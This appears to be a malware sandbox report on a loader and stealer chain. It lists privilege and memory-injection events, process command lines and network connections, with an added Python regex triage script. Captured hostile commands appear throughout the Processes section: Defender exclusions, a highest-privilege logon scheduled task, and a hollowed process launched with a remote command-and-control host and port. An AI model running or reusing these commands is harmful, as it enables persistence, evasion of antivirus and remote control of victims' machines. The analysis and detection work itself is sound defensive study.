N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4192 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 4192 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 4192 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 4192 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 4192 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 4192 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 1840 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 1840 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 4624 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe C:\Windows\system32\cmd.exe
PID 4624 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe C:\Windows\system32\cmd.exe
PID 1840 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 1840 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 1840 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 3884 wrote to memory of 4616 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3884 wrote to memory of 4616 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3884 wrote to memory of 1604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3884 wrote to memory of 1604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3884 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3884 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 992 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 992 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 992 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 1944 wrote to memory of 3704 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1944 wrote to memory of 3704 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1944 wrote to memory of 3704 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 992 wrote to memory of 4280 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\explorer.exe
PID 992 wrote to memory of 4280 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\explorer.exe
PID 992 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 992 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 992 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 992 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 992 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 992 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 992 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 992 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 992 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\SysWOW64\cmd.exe
PID 992 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\SysWOW64\cmd.exe
PID 992 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\SysWOW64\cmd.exe
PID 844 wrote to memory of 1328 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 844 wrote to memory of 1328 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 844 wrote to memory of 1328 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 844 wrote to memory of 2888 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 844 wrote to memory of 2888 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 844 wrote to memory of 2888 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 3400 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
PID 3008 wrote to memory of 3400 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
PID 1328 wrote to memory of 3944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1328 wrote to memory of 3944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1328 wrote to memory of 3944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 2172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 2172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 2172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1240 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 1240 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 1240 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 1240 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 1240 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 1240 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 2064 wrote to memory of 1892 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2064 wrote to memory of 1892 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2064 wrote to memory of 1892 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4136 wrote to memory of 4616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4136 wrote to memory of 4616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4136 wrote to memory of 4616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe

Processes

C:\Users\Admin\AppData\Local\Temp\custom1.exe

"C:\Users\Admin\AppData\Local\Temp\custom1.exe"

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Users\Admin\AppData\Local\Temp\switched.exe

"C:\Users\Admin\AppData\Local\Temp\switched.exe"

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Users\Admin\AppData\Local\Temp\tesetey.exe

"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2vvhbn10\2vvhbn10.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5488.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6FB58647E86F4633B75AC84240E5CCD1.TMP"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\YourPhone.exe & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit

C:\Users\Admin\AppData\Local\Temp\YourPhone.exe

C:\Users\Admin\AppData\Local\Temp\YourPhone.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp68CC.tmp.bat""

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\System32\CatRoot\$SXR\$SXR.exe

"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
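The command lines above record the chain, not just the binaries, and several steps in it matter for triage. pulse x loader.exe runs certutil -hashfile against its own image and strips the header lines with find /i /v, a self-integrity check of the kind loaders with a licensing back end perform (keyauth.win appears in the Network section). tesetey.exe compiles C# at run time through csc.exe (the 2vvhbn10.cmdline and 2vvhbn10.0.cs files in the Files section) and then launches cvtres.exe with the arguments ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM. cvtres.exe is the .NET resource converter and takes no such arguments; together with the eight WriteProcessMemory events from PID 992 into PID 844 (the cvtres.exe instance that goes on to spawn the cmd.exe wrappers) and the "Suspicious use of SetThreadContext" signature, this is consistent with the stealer client being hollowed into a legitimately named process. The two Add-MpPreference -ExclusionPath calls (one with the full path, one with the bare name cvtres.exe) then exclude that process from Defender scanning; Add-MpPreference needs an elevated context, and the sandbox user here is Admin. Client.exe registers the scheduled task $SXR at logon with /rl highest, pointing at a copy under System32\CatRoot, a directory that normally holds only catalog files, and separately drops tmp68CC.tmp.bat, whose visible child is timeout 3 (the "Delays execution with timeout.exe" signature). The Python below, added here as an example and not part of the sandbox report or of any vendor's rule set, encodes those observations as regex rules and runs them over the command lines copied from this section; the rule names are this example's own and the patterns are tuned to this report's artefacts rather than offered as general-purpose detections.

```python
"""Command-line triage over the Processes section above.

Added example; not part of the sandbox report or of any vendor's rule set.
REPORT_CMDLINES holds command lines copied from this section. The rule
names are this example's own and the regexes are tuned to this report's
artefacts, not offered as general-purpose detections.
"""
import re
from typing import Dict, List

# Command lines copied from the Processes section (one per line).
REPORT_CMDLINES = [l.strip() for l in r'''
"C:\Users\Admin\AppData\Local\Temp\custom1.exe"
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5488.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6FB58647E86F4633B75AC84240E5CCD1.TMP"
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\YourPhone.exe & exit
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp68CC.tmp.bat""
timeout 3
"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
'''.splitlines() if l.strip()]

# (label, pattern). A command line may match several rules.
RULES = [
    # Defender exclusion added via PowerShell (seen for the full cvtres.exe path and for the bare name)
    ("defender_exclusion", re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I)),
    # On-logon scheduled task at the highest run level: persistence for $SXR.exe
    ("schtasks_onlogon_highest", re.compile(r"schtasks\s+/create.*/sc\s+onlogon.*/rl\s+highest", re.I)),
    # Loader hashing a file with certutil (here: its own image, an integrity check)
    ("certutil_hashfile", re.compile(r"certutil\s+-hashfile", re.I)),
    # cvtres.exe launched with arguments that are not switches; the legitimate csc.exe child uses /NOLOGO ...
    ("cvtres_nonswitch_args", re.compile(r"cvtres\.exe\"?\s+(?![/&|])\S+", re.I)),
    # cmd /k start /b <target> & exit: detach a child so the wrapper can exit immediately
    ("cmd_start_b_detach", re.compile(r"cmd\.exe\"?\s+/k\s+start\s+/b", re.I)),
    # cmd /c ""...tmp.bat"": batch file dropped to %TEMP% to stage the next step
    ("temp_batch_launcher", re.compile(r"cmd\.exe\s+/c\s+\"\".*\.bat\"\"", re.I)),
    # timeout N used as a sleep primitive
    ("timeout_delay", re.compile(r"^timeout\s+\d+", re.I)),
    # an executable under System32\CatRoot, which normally holds only .cat files
    ("exe_under_catroot", re.compile(r"\\System32\\CatRoot\\[^\s\"']+\.exe", re.I)),
]


def classify(cmdline: str) -> List[str]:
    """Labels of every rule the command line matches, in RULES order."""
    return [label for label, rx in RULES if rx.search(cmdline)]


def triage(cmdlines: List[str]) -> Dict[str, List[str]]:
    """Map each label to the command lines that triggered it."""
    hits: Dict[str, List[str]] = {}
    for c in cmdlines:
        for label in classify(c):
            hits.setdefault(label, []).append(c)
    return hits


def untriaged(cmdlines: List[str]) -> List[str]:
    """Command lines no rule explains; these still need a human look."""
    return [c for c in cmdlines if not classify(c)]


if __name__ == "__main__":
    for label, lines in triage(REPORT_CMDLINES).items():
        print(f"{label}: {len(lines)}")
    print("untriaged:", untriaged(REPORT_CMDLINES))
```

The legitimate csc.exe to cvtres.exe compile step (the /NOLOGO /READONLY invocation) is deliberately left unflagged, so a hit on cvtres_nonswitch_args separates the hollowed instance from the compiler's own child; the two lines that remain untriaged are the initial sample and that compile step.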

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 keyauth.win udp
US 172.67.72.57:443 keyauth.win tcp
US 8.8.8.8:53 80.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 173.222.13.40:80 x2.c.lencr.org tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 57.72.67.172.in-addr.arpa udp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 8.8.8.8:53 case-shield.gl.at.ply.gg udp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 172.67.72.57:443 keyauth.win tcp
US 8.8.8.8:53 178.223.142.52.in-addr.arpa udp
US 8.8.8.8:53 operating-noble.gl.at.ply.gg udp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
N/A 127.0.0.1:58070 N/A tcp
N/A 127.0.0.1:58072 N/A tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
N/A 127.0.0.1:58138 N/A tcp
N/A 127.0.0.1:58140 N/A tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 8.8.8.8:53 62.179.17.96.in-addr.arpa udp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
